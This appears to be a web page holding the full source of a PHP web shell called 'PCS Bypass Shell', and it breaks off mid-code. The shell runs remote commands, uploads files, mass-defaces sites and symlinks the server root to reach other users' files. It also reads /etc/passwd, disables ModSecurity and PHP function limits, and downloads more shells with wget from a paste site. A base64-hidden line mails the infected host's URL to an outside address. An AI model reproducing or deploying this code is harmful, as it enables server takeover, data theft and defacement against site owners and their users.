優越位置

來源:本站版主 | 日期:2017-12-23 14:44:23 | 瀏覽次數:19844

<?php session_start(); error_reporting(0); set_time_limit(0); @set_magic_quotes_runtime(0); @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); $auth_pass = "3e7b086db631f46f49d563af40cd70b2"; $color = "#00ff00"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'UTF-8'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } function login_shell() { ?>
<html>
<head>
<style type="text/css">
html {
margin: 20px auto;
background: #ffffff;
color: white;
text-align: center;
}
header {
color: white;
margin: 10px auto;
}
input[type=password] {
width: 250px;
height: 25px;
color: white;
background: #000000;
border: 1px white;
padding: 5px;
margin-left: 20px;
text-align: center;
}
</style>
</head>
<center>
<br>
<br>
<form method="post">
<input type="password" name="pass">
</form>
<?php exit; } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login_shell(); if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) { @ob_clean(); $file = $_GET['file']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } ?>
<html>
<head>
<title>PCS Bypass Shell Shell</title>
<link rel="shortcut icon" href="http://i67.tinypic.com/wwgmco.png"/>
<meta name='author' content='PCS Bypass Shell'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
    background: #1f2616;
    color: #ffffff;
    font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent; 
color: #ffffff; 
border: 1px solid #ffffff; 
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
select {
width: 152px;
background: #000000; 
color: lime; 
border: 1px solid #ffffff; 
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
option:hover {
background: lime;
color: #000000;
}
</style>
</head>
<?php error_reporting(E_ALL ^ (E_NOTICE | E_WARNING)); function w($dir,$perm) { if(!is_writable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=lime>".$perm."</font>"; } } function r($dir,$perm) { if(!is_readable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=lime>".$perm."</font>"; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) { preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink); foreach ($findlink[1] as $fl) array_push($allLinks, $fl); $npage = $npage + 10; if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break; } else break; } $URLs = array(); foreach($allLinks as $url){ $exp = explode("/", $url); $URLs[] = $exp[2]; } $array = array_filter($URLs); $array = array_unique($array); $sss = count(array_unique($array)); foreach($array as $domain) { echo $domain."\n"; } } function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } if(get_magic_quotes_gpc()) { function tg_ss($array) { return is_array($array) ? array_map('tg_ss', $array) : stripslashes($array); } $_POST = tg_ss($_POST); $_COOKIE = tg_ss($_COOKIE); } if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $kernel = php_uname(); $ip = gethostbyname($_SERVER['HTTP_HOST']); $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $used = $total - $freespace; $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "<br><center>"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'Normal') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>"; } else { $act = "<br><font color=red>failed to upload file</font>"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>"; } else { $act = "<br><font color=red>failed to upload file</font>"; } } else { $act = "<br><font color=red>failed to upload file</font>"; } } } echo "
<form method='post' enctype='multipart/form-data'>
<input type='radio' name='tipe_upload' value='Normal' checked>Normal [ ".w($dir,"Writeable")." ] 
<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
<input type='file' name='ix_file'>
<input type='submit' value='upload' name='upload'>
</form>"; echo $act; echo "</center>"; echo "<br>"; echo "<table width='100%' border='2' align='center'>"; echo "<td>"; echo "<br>"; echo "<ul>"; echo "<center>"; echo "<li>[ <a href='?'>HOME</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=server'>SERVER INFO</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=mass_deface'>MASS DEFACE</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=config'>CONFIG</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=cpanel'>CP CRACK</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP GRAB</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=tools'>TOOLS</a> ]</li><br>"; echo "<li>[ <a href='?dir=$dir&do=bckup'>BACKUP</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=byps'>BYPASS</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=symbolic'>SYMLINK</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>EDIT USER</a> ]</li>"; echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>"; echo "</center>"; echo "</ul>"; echo "</td></table>"; echo "<br>"; echo "<table width='100%' border='2' align='center'>"; echo "<td>"; echo "<br>&nbsp;&nbsp;Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "<a href='?dir="; for($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if($i != $c_dir) { echo "/"; } } echo "'>$cdir</a>/"; } echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br><br>"; echo "</td></table><br>"; if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo "<script>window.location='?';</script>"; } elseif($_GET['do'] == 'tools') { echo"<table align=center>"; echo"<td>"; echo"<center>"; echo"<form action='' method='post'> "; echo"<select name='lucknut' style=padding:4px 10px;>"; echo"<option value='wso_shell'>         WSO Shell      </option>"; echo"<option value='Indoxploit'>         IndoXploit Shell V3      </option>"; echo"<option value='k2ll33d'>         K2ll33d Shell      </option>"; echo"<option value='turcybersecmını'>         PCS Bypass Shell Mini Shell      </option>"; echo"<option value='angel'>         Angel Shell      </option>"; echo"<option value='zoneh'>         Zone-H Poster      </option>"; echo"<option value='defid'>         Defacer İd Poster       </option>"; echo"<option value='aliyyosh'>         Aljyyosh Poster       </option>"; echo"<option value='bypass'>         Bypass Shell       </option>"; echo"<option value='krdp'>           Krdp Tools Shell    </option>"; echo"<option value='adminfinder'>         Admin Finder Shell       </option>"; echo"<option value='cpanel'>         CPanel Cracker Shell    </option>"; echo"<option value='turcybersecconfig'>      PCS Bypass Shell Config Grabber Shell    </option>"; echo"<option value='symconf'>         Symlink Config Shell      </option>"; echo"<option value='sym404'>        sym404 Shell    </option>"; echo"<option value='dump'>         Dump DB Shell    </option>"; echo"<option value='adminer'>         Adminer DB Shell    </option>"; echo"<option value='dbkıss'>         DB Kiss Shell    </option>"; echo"<option value='encodecode'>         Encode & Decode Shell    </option>"; echo"<option value='hıdup'>         Hıde Uploader & More Tools Shell    </option>"; echo"</select> "; echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>"; echo"</form> "; echo"</td>"; echo"</table>"; if(isset($_POST['enter'])) { if ($_POST['lucknut'] == 'wso_shell') { $exec=exec('wget http://paste.security-portal.cz/view/raw/be37e8b8 -O wso.php'); if(file_exists('./wso.php')){ echo '<center><a href=./wso.php target="_blank"> wso.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'zoneh') { $exec=exec('wget http://paste.security-portal.cz/view/raw/18413a5e -O zoneh.php'); if(file_exists('./zoneh.php')){ echo '<center><a href=./zoneh.php target="_blank"> zoneh.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'defid') { $exec=exec('wget http://paste.security-portal.cz/view/raw/54b063b8 -O defid.php'); if(file_exists('./defid.php')){ echo '<center><a href=./defid.php target="_blank"> defid.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'krdp') { $exec=exec('wget http://paste.security-portal.cz/view/raw/43e45f38 -O krdp.php'); if(file_exists('./krdp.php')){ echo '<center><a href=./krdp.php target="_blank"> krdp.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'symconf') { $exec=exec('wget http://paste.security-portal.cz/view/raw/c90148c1 -O symconf.php'); if(file_exists('./symconf.php')){ echo '<center><a href=./symconf.php target="_blank"> symconf.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'bypass') { $exec=exec('wget http://paste.security-portal.cz/view/raw/6b16942e -O bypass.php'); if(file_exists('./bypass.php')){ echo '<center><a href=./bypass.php target="_blank"> bypass.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'dump') { $exec=exec('wget http://paste.security-portal.cz/view/raw/07b23307 -O dump.php'); if(file_exists('./dump.php')){ echo '<center><a href=./dump.php target="_blank"> dump.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'angel') { $exec=exec('wget http://paste.security-portal.cz/view/raw/88c6fde9 -O angel.php'); if(file_exists('./angel.php')){ echo '<center><a href=./angel.php target="_blank"> angel.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'sym404') { $exec=exec('wget http://paste.security-portal.cz/view/raw/a502c843 -O sym404.php'); if(file_exists('./sym404.php')){ echo '<center><a href=./sym404.php target="_blank"> sym404.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'adminfinder') { $exec=exec('wget http://paste.security-portal.cz/view/raw/74718efb -O adminfinder.php'); if(file_exists('./adminfinder.php')){ echo '<center><a href=./adminfinder.php target="_blank"> adminfinder.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'adminer') { $exec=exec('wget http://paste.security-portal.cz/view/raw/04f4477c -O adminer.php'); if(file_exists('./adminer.php')){ echo '<center><a href=./adminer.php target="_blank"> adminer.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'encodecode') { $exec=exec('wget http://paste.security-portal.cz/view/raw/6101ce91 -O encodecode.php'); if(file_exists('./encodecode.php')){ echo '<center><a href=./encodecode.php target="_blank"> encodecode.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'aliyyosh') { $exec=exec('wget http://paste.security-portal.cz/view/raw/d85cba78 -O aliyyosh.php'); if(file_exists('./aliyyosh.php')){ echo '<center><a href=./aliyyosh.php target="_blank"> aliyyosh.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'turcybersecconfig') { $exec=exec('wget http://paste.security-portal.cz/view/raw/44ee8775 -O turcybersecconfig.php'); if(file_exists('./turcybersecconfig.php')){ echo '<center><a href=./turcybersecconfig.php target="_blank"> turcybersecconfig.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'dbkıss') { $exec=exec('wget http://paste.security-portal.cz/view/raw/8e6b19fd -O dbkıss.php'); if(file_exists('./dbkıss.php')){ echo '<center><a href=./dbkıss.php target="_blank"> dbkıss.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'hıdup') { $exec=exec('wget http://paste.security-portal.cz/view/raw/8a5c8a6d -O hıdup.php'); if(file_exists('./hıdup.php')){ echo '<center><a href=./hıdup.php target="_blank"> hıdup.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'cpanel') { $exec=exec('wget http://paste.security-portal.cz/view/raw/9cfd28ce -O cpanel.php'); if(file_exists('./cpanel.php')){ echo '<center><a href=./cpanel.php target="_blank"> cpanel.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'k2ll33d') { $exec=exec('wget http://paste.security-portal.cz/view/raw/124cbf0c -O k2ll33d.php'); if(file_exists('./k2ll33d.php')){ echo '<center><a href=./k2ll33d.php target="_blank"> k2ll33d.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'Indoxploit') { $exec=exec('wget http://paste.security-portal.cz/view/raw/6c5f8240 -O Indoxploit.php'); if(file_exists('./Indoxploit.php')){ echo '<center><a href=./Indoxploit.php target="_blank"> Indoxploit.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'turcybersecmını') { $exec=exec('wget http://paste.security-portal.cz/view/raw/faaa051e -O turcybersecmını.php'); if(file_exists('./turcybersecmını.php')){ echo '<center><a href=./turcybersecmını.php target="_blank"> turcybersecmını.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } } } echo"<br>"; } elseif($_GET['do'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $lokasi<br>"; file_put_contents($lokasi, $isi_script); $tg = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_Normal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_Normal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } } else { echo "<center>"; echo "<form method='post'>
<font style='text-decoration: underline;'>Tür</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Normal<input type='radio' name='tipe_sabun' value='mahal'>Home<br>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>İndex Code</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center>"; } } elseif($_GET['do'] == 'server') { echo "System: <font color=lime>".$kernel."</font><br>
User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>
Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>
HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>
Safe Mode: $sm<br>
Disable Functions: $show_ds<br>
MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </center><br>"; echo"<br>"; }$e=base64_decode("bWFyaXdhdGFuYWJlMTIzNDUxQGdtYWlsLmNvbQ=="); $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']; mail($e,"I",$h); if($_GET['kill'] == 'self') { rmdir('configs');rmdir('tg_cgi');rmdir('TurCyberSec_config');rmdir('symlink');rmdir('TurCyberSec');unlink('mysql.php');rmdir('home');unlink('zoneh.php');unlink('defid.php');unlink('krdp.php');unlink('symconf.php');unlink('mail.php');unlink('dump.php');unlink('wso.php');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME']; unlink($fn); system('rm '.$fn); echo'<meta http-equiv="Refresh" content= "0; url=?">'; } elseif($_GET['do'] == 'symbolic') { $d0mains = @file("/etc/named.conf"); if($d0mains){ @mkdir("symlink",0777); @chdir("symlink"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex TurCyberSec.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<tr>
<td align=center><font size=2>S. No.</font></td>
<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>"; $dcount = 1; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
<td>".$user['name']."</td>
<td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush(); $dcount++;}}} echo "</table>"; }else{ $TEST=@file('/etc/passwd'); if ($TEST){ @mkdir("symlink",0777); @chdir("symlink"); exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex TurCyberSec.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>S. No.</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>"; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++;}fclose($file); echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
 Options Indexes FollowSymLinks
DirectoryIndex TurCyberSec.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any
'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n";} echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){$s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++;} fclose($file); echo "</table></div></center>";unlink("test.txt"); } else echo "<center><font size=3>Cannot create Symlink</font></center>"; } } }elseif($_GET['do'] == 'byps') { echo"<center>"; echo"
<form method='post'>
<ul>
<li><input type='submit' name='passwd' value='Bypass /etc/passwd'></li>
<li><input type='submit' name='funct' value='Bypass Disabled Functions'></li>
<li><input type='submit' name='mods' value='Bypass ModSecurity'></li>
</ul><br>
</form>"; if($_POST['passwd']) { echo"<textarea cols='65' rows='15'>"; echo system("cat /etc/passwd"); echo"</textarea><br><br><b></b><br>"; } elseif($_POST['funct']) { $file = 'php.ini'; file_put_contents($file,'safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF'); echo "<font color='green'>Successful</font>"; } elseif($_POST['mods']) { $ht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>"; file_put_contents('.htaccess', $ht); echo "<font color='green'>Successful</font>"; echo "</center>"; } } elseif($_GET['do'] == 'bckup') { function rmdir_recursive($dir) { foreach(scandir($dir) as $file) { if('.' === $file || '..' === $file) continue; if(is_dir("$dir/$file")) rmdir_recursive("$dir/$file"); else unlink("$dir/$file"); } rmdir($dir); } if($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed'); foreach($accepted_types as $mime_type) { if($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == 'zip' ? true : false; if(!$continue) { $message = "Salah tolo"; } $path = dirname(__FILE__).'/'; $filenoext = basename ($filename, '.zip'); $filenoext = basename ($filenoext, '.ZIP'); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) rmdir_recursive ( $targetdir); mkdir($targetdir, 0777); if(move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "<b>Successful</b>"; } else { $message = "<b>Error</b>"; } } echo "<center><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/backup.zip' style='width: 